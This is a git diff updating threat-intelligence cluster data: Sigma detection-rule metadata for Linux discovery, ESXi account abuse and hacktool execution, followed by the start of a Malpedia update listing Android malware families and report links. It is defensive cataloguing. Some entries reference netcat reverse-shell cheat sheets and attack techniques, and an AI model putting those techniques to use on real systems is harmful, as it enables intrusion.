deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered" + ], + "filename": "proc_creation_lnx_susp_inod_listing.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", + "https://blog.skyplabs.net/posts/container-detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "related": [ + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "43e26eb5-cd58-48d1-8ce9-a273f5d298d8", + "value": "Potential Container Discovery Via Inodes Listing" + }, { "description": "Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.\nInformation obtained could be used to gain an understanding of common software/applications running on systems within the network\n", "meta": { @@ -94569,8 +97450,8 @@ "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://man7.org/linux/man-pages/man1/ncat.1.html", "https://www.revshells.com/", - "https://www.infosecademy.com/netcat-reverse-shells/", "https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/", + "https://www.infosecademy.com/netcat-reverse-shells/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml" ], "tags": [ @@ -94603,13 +97484,25 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.computerhope.com/unix/unohup.htm", "https://en.wikipedia.org/wiki/Nohup", "https://gtfobins.github.io/gtfobins/nohup/", + "https://www.computerhope.com/unix/unohup.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059.004" + ] }, + "related": [ + { + "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", "value": "Nohup Execution" }, @@ -94726,6 +97619,49 @@ "uuid": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", "value": "Connection Proxy" }, + { + "description": "Detects execution of the \"esxcli\" command with the \"vsan\" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon", + "creation_date": "2023/09/04", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_esxcli_vsan_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html", + "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1007" + ] + }, + "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "d54c2f06-aca9-4e2b-81c9-5317858f4b79", + "value": "ESXi VSAN Information Discovery Via ESXCLI" + }, { "description": "Detects known hacktool execution based on image name", "meta": { @@ -94739,10 +97675,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://github.com/pathtofile/bad-bpf", + "Internal Research", "https://github.com/Gui774ume/ebpfkit", "https://github.com/carlospolop/PEASS-ng", - "Internal Research", - "https://github.com/pathtofile/bad-bpf", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml" ], "tags": [ @@ -94752,6 +97688,74 @@ "uuid": "a015e032-146d-4717-8944-7a1884122111", "value": "Linux HackTool Execution" }, + { + "description": "Detects listing or file reading of \".dockerenv\" which can be a sing of potential container discovery", + "meta": { + "author": "Seth Hanford", + "creation_date": "2023/08/23", + "falsepositive": [ + "Legitimate system administrator usage of these commands", + "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered" + ], + "filename": "proc_creation_lnx_susp_dockerenv_recon.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", + "https://blog.skyplabs.net/posts/container-detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "related": [ + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "11701de9-d5a5-44aa-8238-84252f131895", + "value": "Docker Container Discovery Via Dockerenv Listing" + }, + { + "description": "Detects user account creation on ESXi system via esxcli", + "meta": { + "author": "Cedric Maurugeon", + "creation_date": "2023/08/22", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_esxcli_user_account_creation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136" + ] + }, + "related": [ + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db", + "value": "ESXi Account Creation Via ESXCLI" + }, { "description": "Detects common command used to enable bpf kprobes tracing", "meta": { @@ -94765,9 +97769,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://bpftrace.org/", "https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html", + "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml" ], "tags": [ @@ -94824,9 +97828,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", - "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", + "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", + "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml" ], "tags": [ @@ -94847,6 +97851,64 @@ "uuid": "f9b3edc5-3322-4fc7-8aa3-245d646cc4b7", "value": "Potential Linux Amazon SSM Agent Hijacking" }, + { + "description": "Detects execution of the \"esxcli\" command with the \"system\" and \"permission\" flags in order to assign admin permissions to an account.", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2023/09/04", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_lnx_esxcli_permission_change_admin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "9691f58d-92c1-4416-8bf3-2edd753ec9cf", + "value": "ESXi Admin Permission Assigned To Account Via ESXCLI" + }, + { + "description": "Detects potential container discovery via listing of certain kernel features in the \"/proc\" virtual filesystem", + "meta": { + "author": "Seth Hanford", + "creation_date": "2023/08/23", + "falsepositive": [ + "Legitimate system administrator usage of these commands", + "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered" + ], + "filename": "proc_creation_lnx_susp_container_residence_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "linux", + "refs": [ + "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", + "https://blog.skyplabs.net/posts/container-detection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "related": [ + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "746c86fb-ccda-4816-8997-01386263acc4", + "value": "Container Residence Discovery Via Proc Virtual FS" + }, { "description": "Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system", "meta": { @@ -94860,9 +97922,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/", - "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml" ], "tags": [ @@ -94897,8 +97959,8 @@ "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", - "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", + "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml" ], "tags": [ @@ -94931,8 +97993,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://research.splunk.com/endpoint/linux_doas_tool_execution/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" ], "tags": [ @@ -95065,8 +98127,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://attack.mitre.org/techniques/T1548/001/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", + "https://attack.mitre.org/techniques/T1548/001/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" ], "tags": [ @@ -95099,9 +98161,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/apache/spark/pull/36315/files", "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" ], "tags": [ @@ -95172,12 +98234,24 @@ "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", - "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", + "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] }, + "related": [ + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "312b42b1-bded-4441-8b58-163a3af58775", "value": "Potentially Suspicious Execution From Tmp Folder" }, @@ -95227,8 +98301,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", + "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" ], "tags": [ @@ -95306,5 +98380,5 @@ "value": "Security Software Discovery - Linux" } ], - "version": 20230823 + "version": 20230924 } From a9a051ffaa874ce9c43ca5bd03ef49d04a7cab5a Mon Sep 17 00:00:00 2001 From: fl0x2208 Date: Tue, 26 Sep 2023 12:27:10 +1000 Subject: [PATCH 03/16] malpedia 2023 September update malpedia 2023 September update --- clusters/malpedia.json | 26806 +++++++++++++++++++++------------------ 1 file changed, 14666 insertions(+), 12140 deletions(-) diff --git a/clusters/malpedia.json b/clusters/malpedia.json index dc625e6..46f5e10 100644 --- a/clusters/malpedia.json +++ b/clusters/malpedia.json @@ -13,29 +13,29 @@ "name": "Malpedia", "source": "Malpedia", "type": "malpedia", - "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e", + "uuid": "1d1c9af9-37fa-4deb-a928-f9b0abc7354a", "values": [ { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://www.cisa.gov/uscert/ncas/alerts/aa20-239a", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://www.us-cert.gov/ncas/alerts/TA18-275A", - "https://www.youtube.com/watch?v=zGvQPtejX9w", - "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf", - "https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware", - "https://github.com/fboldewin/FastCashMalwareDissected/", - "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf", - "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/", - "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.cisa.gov/uscert/ncas/alerts/TA18-275A", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware", - "https://www.cisa.gov/uscert/ncas/alerts/TA18-275A" + "https://www.us-cert.gov/ncas/alerts/TA18-275A", + "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf", + "https://github.com/fboldewin/FastCashMalwareDissected/", + "https://www.cisa.gov/uscert/ncas/alerts/aa20-239a", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", + "https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf", + "https://www.youtube.com/watch?v=zGvQPtejX9w", + "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/", + "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.youtube.com/watch?v=LUxOcpIRxmg" ], "synonyms": [], "type": [] @@ -62,11 +62,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.aberebot", "https://blog.cyble.com/2022/03/10/aberebot-returns-as-escobar/", - "https://twitter.com/_icebre4ker_/status/1460527428544176128", "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", "https://hothardware.com/news/escobar-banking-trojan-targets-mfa-codes", "https://www.bleepingcomputer.com/news/security/android-malware-escobar-steals-your-google-authenticator-mfa-codes/", - "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/" + "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/", + "https://twitter.com/_icebre4ker_/status/1460527428544176128" ], "synonyms": [ "Escobar" @@ -77,13 +77,13 @@ "value": "Aberebot" }, { - "description": "", + "description": "According to PCrisk, AbstractEmu is the name of rooting malware that can gain privileged access to the Android operating system. Threat actors behind AbstractEmu are using legitimate-looking apps (like password managers, app launchers, data savers) to trick users into downloading and opening/executing this malware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.abstract_emu", - "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", "https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord" + "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/" ], "synonyms": [], "type": [] @@ -96,8 +96,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/", "https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/", "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/" ], "synonyms": [ @@ -137,14 +137,27 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.agentsmith", + "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "34770e6e-e2c3-4e45-aa86-9d74b5309773", + "value": "Agent Smith" + }, + { + "description": "According to PCrisk, Ahmyth is a Remote Access Trojan (RAT) targeting Android users. It is distributed via trojanized (fake) applications. Ahmyth RAT steals cryptocurrency and banking credentials, 2FA codes, lock screen passcodes, and captures screenshots.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth", + "https://www.secrss.com/articles/24995", "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w", "https://securelist.com/transparent-tribe-part-2/98233/", - "https://www.secrss.com/articles/24995", - "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", - "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/" + "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/", + "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset" ], "synonyms": [], "type": [] @@ -157,18 +170,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien", - "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html", - "https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets", - "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/", - "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", - "https://drive.google.com/file/d/1qd7Nqjhe2vyGZ5bGm6gVw0mM1D6YDolu/view?usp=sharing", - "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/", - "https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/", - "https://twitter.com/_CPResearch_/status/1603375823448317953", "https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf", - "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", + "https://drive.google.com/file/d/1qd7Nqjhe2vyGZ5bGm6gVw0mM1D6YDolu/view?usp=sharing", + "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html", + "https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets", + "https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/", + "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/", + "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html", + "https://twitter.com/_CPResearch_/status/1603375823448317953", + "https://muha2xmad.github.io/malware-analysis/alien/", + "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/", "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace", - "https://muha2xmad.github.io/malware-analysis/alien/" + "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/" ], "synonyms": [ "AlienBot" @@ -200,22 +213,23 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anatsa", - "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html", - "https://twitter.com/ThreatFabric/status/1394958795508523008", - "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/", - "https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html", - "https://twitter.com/_icebre4ker_/status/1416409813467156482", - "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered", - "https://gbhackers.com/teabot-banking-trojan/", - "https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe", - "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368", "https://labs.k7computing.com/index.php/play-store-app-serves-teabot-via-github/", - "https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html", - "https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf", - "https://www.cleafy.com/documents/teabot", - "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/", "https://www.buguroo.com/hubfs/website/pdf/reports/buguroo-malware-report-Toddler_EN.pdf", - "https://labs.k7computing.com/?p=22407" + "https://www.threatfabric.com/blogs/anatsa-hits-uk-and-dach-with-new-campaign", + "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368", + "https://twitter.com/_icebre4ker_/status/1416409813467156482", + "https://twitter.com/ThreatFabric/status/1394958795508523008", + "https://www.cleafy.com/documents/teabot", + "https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe", + "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/", + "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html", + "https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html", + "https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html", + "https://gbhackers.com/teabot-banking-trojan/", + "https://labs.k7computing.com/?p=22407", + "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered", + "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/", + "https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf" ], "synonyms": [ "ReBot", @@ -232,16 +246,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/", "https://github.com/DesignativeDave/androrat", - "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset", + "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat", "https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat", "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html", - "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat", - "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/", - "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html", - "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", + "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg", "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/", - "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg" + "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", + "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html", + "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset" ], "synonyms": [], "type": [] @@ -254,34 +268,34 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis", - "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html", - "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html", - "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/", - "https://0x1c3n.tech/anubis-android-malware-analysis", - "https://securelist.com/mobile-malware-evolution-2019/96280/", - "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/", - "https://pentest.blog/n-ways-to-unpack-mobile-malware/", - "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/", - "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html", - "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/", - "http://blog.koodous.com/2017/05/bankbot-on-google-play.html", - "https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html", - "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus", - "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb", - "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/", - "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html", + "https://assets.virustotal.com/reports/2021trends.pdf", "https://muha2xmad.github.io/malware-analysis/anubis/", - "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html", - "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", - "https://community.riskiq.com/article/85b3db8c", - "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html", - "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/", "https://www.youtube.com/watch?v=U0UsfO-0uJM", + "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html", + 